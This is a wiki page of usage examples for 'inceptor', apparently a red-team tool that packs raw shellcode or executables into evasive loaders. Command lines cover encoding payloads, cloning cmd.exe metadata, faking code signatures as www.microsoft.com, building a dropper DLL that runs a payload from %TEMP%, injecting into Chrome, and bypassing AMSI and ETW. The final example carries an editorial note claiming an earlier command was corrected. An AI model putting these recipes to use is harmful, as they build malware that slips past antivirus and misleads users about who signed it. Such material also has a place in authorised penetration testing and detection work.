
Examples by scenario

klezVirus edited this page Sep 21, 2021 · 1 revision

Examples

This page is a scenario-based reference for anyone learning how to use inceptor who wants to get the most out of it.

Basic usage

Native Generator

Packing of raw shellcode into native EXE, using default compiler (cl.exe)

python inceptor.py native shellcode.raw -o packed.exe

Packing of raw shellcode into native DLL, using default compiler (cl.exe)

python inceptor.py native shellcode.raw -o packed.dll

Packing of raw shellcode into native DLL, using alternate compiler (clang.exe)

python inceptor.py native shellcode.raw -o packed.dll -C clang

Packing of raw shellcode into native DLL, using an external definition file for exported functions (to avoid name mangling)

python inceptor.py native shellcode.raw -o packed.dll --exports ".\exports.def"

Packing of raw shellcode into native EXE, and compilation of a "dropper" DLL. In the example below, the dropper DLL will write the file packed.exe into %TEMP%, then execute it via system("%TEMP%\packed.exe").

python inceptor.py native shellcode.raw -o packed.exe --dll

Packing of raw shellcode into native EXE, using Shikata-Ga-Nai to encode the shellcode

python inceptor.py native shellcode.raw -o packed.exe --sgn

Packing of raw shellcode into native EXE, using a chain of loader-dependent encoders

python inceptor.py native shellcode.raw -o packed.exe -e nop -e xor

Packing of raw shellcode into native EXE, cloning the metadata from C:\Windows\System32\cmd.exe

python inceptor.py native shellcode.raw -o packed.exe --clone "C:\Windows\System32\cmd.exe"

Packing of raw shellcode into native EXE, signing the binary with CarbonCopy and the www.microsoft.com domain

python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com

Packing of raw shellcode into native EXE, signing the binary with LazySign and the www.microsoft.com domain

python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -so

Packing of raw shellcode into native EXE, signing the binary with SigThief (also clone metadata)

python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"

Packing of EXE into native EXE, using pe_to_shellcode

python inceptor.py native to_pack.exe -o packed.exe -t pe2sh

Packing of EXE into native EXE, using donut and the process injection templates

python inceptor.py native to_pack.exe -o packed.exe -t donut -P

Packing of EXE into native EXE, using donut and the process injection templates, and telling the loader to inject into "Chrome"

python inceptor.py native to_pack.exe -o packed.exe -t donut -P -P0 chrome

Packing a managed DLL into native EXE, using the class Namezpace.Clazz and the method Meth as the entry point

python inceptor.py native to_pack.exe -o packed.exe --classname Namezpace.Clazz --function meth

Dotnet

Most of the examples above can also be used with the DotNet generator.

Packing RAW shellcode into managed EXE, using DInvoke and AMSI/WLDP/ETW bypass

python inceptor.py dotnet to_pack.exe -o packed.exe -m dinvoke -m amsi

Packing RAW shellcode into managed EXE, obfuscating the final binary

python inceptor.py dotnet to_pack.exe -o packed.exe -O

Packing an EXE as a full .NET assembly (to reflectively load via assembly load) into another .NET executable, using a chain of loader-dependent (LD) encoders

python inceptor.py dotnet to_pack.exe -o packed.exe -e xor -e aes -e hex

[*] Multiple compatible templates identified, choose one:
  0: assembly_load.cs
  1: classic.cs
  $> 1

PowerShell

Wrapping an EXE as a full .NET assembly (to reflectively load via assembly load) into a PowerShell script, using a chain of loader-dependent (LD) encoders

python inceptor.py powershell to_pack.exe -o packed.ps1 -e xor -e aes -e hex

Packing RAW shellcode into a PowerShell script, obfuscating the final script and adding an AMSI bypass (the original command used the dotnet generator and an .exe output; corrected below to the powershell generator and a .ps1 output, matching the example above)

python inceptor.py powershell to_pack.exe -o packed.ps1 -O -m amsi